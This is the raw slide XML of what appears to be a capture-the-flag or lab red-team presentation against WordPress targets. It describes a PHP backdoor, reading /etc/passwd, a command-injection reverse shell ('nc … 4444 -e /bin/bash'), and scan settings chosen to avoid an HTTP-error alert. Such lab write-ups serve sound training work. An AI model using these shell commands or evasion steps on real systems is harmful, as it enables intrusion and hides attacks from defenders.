          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515100" y="3894500"/>
            <a:ext cx="23319349" cy="592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2"/>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Table of Contents</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2327" name="Google Shape;2327;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1802600"/>
            <a:ext cx="24377701" cy="972900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="243750" rIns="1219000" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This document contains the following resources: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2328" name="Google Shape;2328;p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a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2329" name="Google Shape;2329;p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
        <p:nvSpPr>
          <p:cNvPr id="2330" name="Google Shape;2330;p2"/>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SzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Network Topology &amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2331" name="Google Shape;2331;p2"/>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SzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Exploits Used</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2332" name="Google Shape;2332;p2"/>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SzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Methods Used to Avoid Detection</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gf9c6693cea_2_42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108500" cy="1423200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2487" name="Google Shape;2487;gf9c6693cea_2_4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20</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2488" name="Google Shape;2488;gf9c6693cea_2_42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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This allowed us to use an exploit shell which created a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>backdoor.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, able to execute commands via HTTP:</a:t>
            </a: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A test of the backdoor revealed proper exploitation. Here we view the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/passwd directory:</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2489" name="Google Shape;2489;gf9c6693cea_2_42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192375" y="4055613"/>
            <a:ext cx="16881350" cy="1157575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2490" name="Google Shape;2490;gf9c6693cea_2_42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192375" y="7469550"/>
            <a:ext cx="15837356" cy="4692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gf9c6693cea_2_51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108500" cy="1423200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2496" name="Google Shape;2496;gf9c6693cea_2_5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21</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2497" name="Google Shape;2497;gf9c6693cea_2_51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="10377900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Establishing remote code execution, now we used Ncat which allowed us to remotely connect to the server itself. First we established the Kali machine as a ‘listener’ on port 4444:</a:t>
            </a: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Now we insert into the URL: nc 192.168.1.115 4444 -e /bin/bash</a:t>
            </a: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This makes Target 2 broadcast to port 4444 and establish a connection.</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2498" name="Google Shape;2498;gf9c6693cea_2_51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4512850" y="4562625"/>
            <a:ext cx="13570150" cy="2577275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2499" name="Google Shape;2499;gf9c6693cea_2_51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="600951" y="8414275"/>
            <a:ext cx="23147651" cy="19611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gf9c6693cea_2_62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108500" cy="1423200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2505" name="Google Shape;2505;gf9c6693cea_2_6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22</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2506" name="Google Shape;2506;gf9c6693cea_2_62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="10377900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Now that the remote connection has been established, we can traverse the directories at will to find the desired confidential information:</a:t>
            </a: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457200" lvl="0" indent="-469900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flag 3 could be seen at ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.115/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/wp-content/uploads/2018/11/flag3.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr sz="3800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2507" name="Google Shape;2507;gf9c6693cea_2_62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2166875" y="3849825"/>
            <a:ext cx="11041925" cy="2200800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2508" name="Google Shape;2508;gf9c6693cea_2_62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2166875" y="6326850"/>
            <a:ext cx="9830775" cy="3108025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2509" name="Google Shape;2509;gf9c6693cea_2_62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2166875" y="9711100"/>
            <a:ext cx="14862175" cy="1046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pic>
        <p:nvPicPr>
          <p:cNvPr id="2514" name="Google Shape;2514;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731334" y="773067"/>
            <a:ext cx="22914824" cy="12246448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2515" name="Google Shape;2515;p1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t>23</a:t>
            </a:fld>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2516" name="Google Shape;2516;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="4936267"/>
            <a:ext cx="22914900" cy="2745600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750"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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Avoiding Detection</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="9600"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2517" name="Google Shape;2517;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-87421" y="34962844"/>
            <a:ext cx="56659498" cy="1612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18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32725" y="229500"/>
            <a:ext cx="24443100" cy="24735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Stealth Exploitation:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr sz="8400">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2523" name="Google Shape;2523;p1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24</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2524" name="Google Shape;2524;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942801"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endParaRPr sz="4400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="4400">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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An “Excessive HTTP Errors” alert would show many failed connections over a short period of time.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This alert is triggered when the HTTP 400 status code errors show in the top five codes within the last five minutes.</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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHEN count() GROUPED OVER top 5 'http.response.status_code' IS ABOVE 400 FOR THE LAST 5 minutes</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Executing nmap -sS (stealthy scan) on specific ports will cause few 400 errors.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enabling passive detection mode with WPScan lowers the chance of detection.</a:t>
            </a:r>
            <a:endParaRPr sz="4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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2529" name="Google Shape;2529;gf9c6693cea_2_73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32725" y="204000"/>
            <a:ext cx="24443100" cy="24480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Stealth Exploitation:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2530" name="Google Shape;2530;gf9c6693cea_2_7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25</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2531" name="Google Shape;2531;gf9c6693cea_2_73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="10658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endParaRPr sz="3600" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
